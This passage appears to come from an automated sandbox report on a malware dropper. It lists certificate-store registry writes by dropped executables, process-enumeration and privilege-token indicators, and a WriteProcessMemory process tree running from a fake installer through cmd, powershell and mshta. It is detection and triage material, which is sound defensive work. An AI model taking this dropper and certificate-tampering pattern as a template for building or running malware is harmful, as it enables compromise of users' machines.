f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	if8DNtponwYMZn_lrw_gH9IF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	if8DNtponwYMZn_lrw_gH9IF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee404000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	if8DNtponwYMZn_lrw_gH9IF.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000004000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	if8DNtponwYMZn_lrw_gH9IF.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	TQJKKsY8bnpKyCSGDiZQru1v.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	TQJKKsY8bnpKyCSGDiZQru1v.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	TQJKKsY8bnpKyCSGDiZQru1v.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	if8DNtponwYMZn_lrw_gH9IF.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeThu13e7fdac52793516f.exeYcKQmqEjHGAUKmVb2NL0JK67.exe

pid	process
2324	powershell.exe
2324	powershell.exe
3108	powershell.exe
3108	powershell.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
4044	Thu13e7fdac52793516f.exe
2324	powershell.exe
3108	powershell.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe
4520	YcKQmqEjHGAUKmVb2NL0JK67.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeThu13a8cbc236137c.exeThu13559beef6a5272.exesearch_hyperfs_206.exechrome.exechrome update.exePBrowserSetp42415.exechrome1.exeF57F.exechrome2.exechrome3.exeexplorer.exeBuild.exeTQJKKsY8bnpKyCSGDiZQru1v.exetaskkill.exeWerFault.exeWerFault.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	3348	Thu13a8cbc236137c.exe
Token: SeDebugPrivilege	4844	Thu13559beef6a5272.exe
Token: SeDebugPrivilege	2388	search_hyperfs_206.exe
Token: SeDebugPrivilege	2988	chrome.exe
Token: SeDebugPrivilege	4760	chrome update.exe
Token: SeDebugPrivilege	2112	PBrowserSetp42415.exe
Token: SeDebugPrivilege	2028	chrome1.exe
Token: SeCreateTokenPrivilege	5420	F57F.exe
Token: SeAssignPrimaryTokenPrivilege	5420	F57F.exe
Token: SeLockMemoryPrivilege	5420	F57F.exe
Token: SeIncreaseQuotaPrivilege	5420	F57F.exe
Token: SeMachineAccountPrivilege	5420	F57F.exe
Token: SeTcbPrivilege	5420	F57F.exe
Token: SeSecurityPrivilege	5420	F57F.exe
Token: SeTakeOwnershipPrivilege	5420	F57F.exe
Token: SeLoadDriverPrivilege	5420	F57F.exe
Token: SeSystemProfilePrivilege	5420	F57F.exe
Token: SeSystemtimePrivilege	5420	F57F.exe
Token: SeProfSingleProcessPrivilege	5420	F57F.exe
Token: SeIncBasePriorityPrivilege	5420	F57F.exe
Token: SeCreatePagefilePrivilege	5420	F57F.exe
Token: SeCreatePermanentPrivilege	5420	F57F.exe
Token: SeBackupPrivilege	5420	F57F.exe
Token: SeRestorePrivilege	5420	F57F.exe
Token: SeShutdownPrivilege	5420	F57F.exe
Token: SeDebugPrivilege	5420	F57F.exe
Token: SeAuditPrivilege	5420	F57F.exe
Token: SeSystemEnvironmentPrivilege	5420	F57F.exe
Token: SeChangeNotifyPrivilege	5420	F57F.exe
Token: SeRemoteShutdownPrivilege	5420	F57F.exe
Token: SeUndockPrivilege	5420	F57F.exe
Token: SeSyncAgentPrivilege	5420	F57F.exe
Token: SeEnableDelegationPrivilege	5420	F57F.exe
Token: SeManageVolumePrivilege	5420	F57F.exe
Token: SeImpersonatePrivilege	5420	F57F.exe
Token: SeCreateGlobalPrivilege	5420	F57F.exe
Token: 31	5420	F57F.exe
Token: 32	5420	F57F.exe
Token: 33	5420	F57F.exe
Token: 34	5420	F57F.exe
Token: 35	5420	F57F.exe
Token: SeDebugPrivilege	5796	chrome2.exe
Token: SeDebugPrivilege	5460	chrome3.exe
Token: SeShutdownPrivilege	1064	explorer.exe
Token: SeCreatePagefilePrivilege	1064	explorer.exe
Token: SeShutdownPrivilege	1064	explorer.exe
Token: SeCreatePagefilePrivilege	1064	explorer.exe
Token: SeDebugPrivilege	3284	Build.exe
Token: SeDebugPrivilege	5476	TQJKKsY8bnpKyCSGDiZQru1v.exe
Token: SeShutdownPrivilege	1064	explorer.exe
Token: SeCreatePagefilePrivilege	1064	explorer.exe
Token: SeShutdownPrivilege	1064	explorer.exe
Token: SeCreatePagefilePrivilege	1064	explorer.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeRestorePrivilege	5852	WerFault.exe
Token: SeBackupPrivilege	5852	WerFault.exe
Token: SeRestorePrivilege	1176	WerFault.exe
Token: SeBackupPrivilege	1176	WerFault.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeIncreaseQuotaPrivilege	2324	powershell.exe
Token: SeSecurityPrivilege	2324	powershell.exe
Token: SeTakeOwnershipPrivilege	2324	powershell.exe

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

Thu13fba7be709523c0e.tmpThu138c8768d77029f.tmpexplorer.exe

pid	process
2704	Thu13fba7be709523c0e.tmp
1540	Thu138c8768d77029f.tmp
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe

Suspicious use of SendNotifyMessage 9 IoCs

Processes:

explorer.exe

pid	process
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe
1064	explorer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

explorer.exe

pid process

1064 explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3640 wrote to memory of 2352	3640	setup_x86_x64_install.exe	setup_installer.exe
PID 3640 wrote to memory of 2352	3640	setup_x86_x64_install.exe	setup_installer.exe
PID 3640 wrote to memory of 2352	3640	setup_x86_x64_install.exe	setup_installer.exe
PID 2352 wrote to memory of 984	2352	setup_installer.exe	setup_install.exe
PID 2352 wrote to memory of 984	2352	setup_installer.exe	setup_install.exe
PID 2352 wrote to memory of 984	2352	setup_installer.exe	setup_install.exe
PID 984 wrote to memory of 1400	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1400	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1400	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1512	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1512	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1512	984	setup_install.exe	cmd.exe
PID 1400 wrote to memory of 3108	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 3108	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 3108	1400	cmd.exe	powershell.exe
PID 1512 wrote to memory of 2324	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 2324	1512	cmd.exe	powershell.exe
PID 1512 wrote to memory of 2324	1512	cmd.exe	powershell.exe
PID 984 wrote to memory of 1860	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1860	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1860	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2252	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2252	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2252	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2120	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2120	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2120	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1692	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1692	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 1692	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2280	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2280	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2280	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2740	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2740	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 2740	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4488	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4488	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4488	984	setup_install.exe	cmd.exe
PID 2280 wrote to memory of 3208	2280	cmd.exe	Thu13ce386e385.exe
PID 2280 wrote to memory of 3208	2280	cmd.exe	Thu13ce386e385.exe
PID 2280 wrote to memory of 3208	2280	cmd.exe	Thu13ce386e385.exe
PID 984 wrote to memory of 4968	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4968	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4968	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3004	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3004	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3004	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3132	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3132	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3132	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3424	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3424	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 3424	984	setup_install.exe	cmd.exe
PID 1860 wrote to memory of 4044	1860	cmd.exe	Thu13e7fdac52793516f.exe
PID 1860 wrote to memory of 4044	1860	cmd.exe	Thu13e7fdac52793516f.exe
PID 1860 wrote to memory of 4044	1860	cmd.exe	Thu13e7fdac52793516f.exe
PID 2252 wrote to memory of 4396	2252	cmd.exe	mshta.exe
PID 2252 wrote to memory of 4396	2252	cmd.exe	mshta.exe
PID 2252 wrote to memory of 4396	2252	cmd.exe	mshta.exe
PID 984 wrote to memory of 4964	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4964	984	setup_install.exe	cmd.exe
PID 984 wrote to memory of 4964	984	setup_install.exe	cmd.exe
PID 2120 wrote to memory of 2420	2120	cmd.exe	Thu138c8768d77029f.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3640

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
